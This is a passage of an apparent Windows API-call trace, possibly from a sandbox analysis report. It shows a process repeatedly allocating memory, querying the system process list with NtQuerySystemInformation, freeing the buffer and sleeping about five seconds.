BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.855] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.874] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.894] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.921] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.942] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.954] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.970] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.985] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.002] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.020] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.033] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.046] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.096] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.115] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.128] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.141] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.174] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.186] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.203] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.220] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 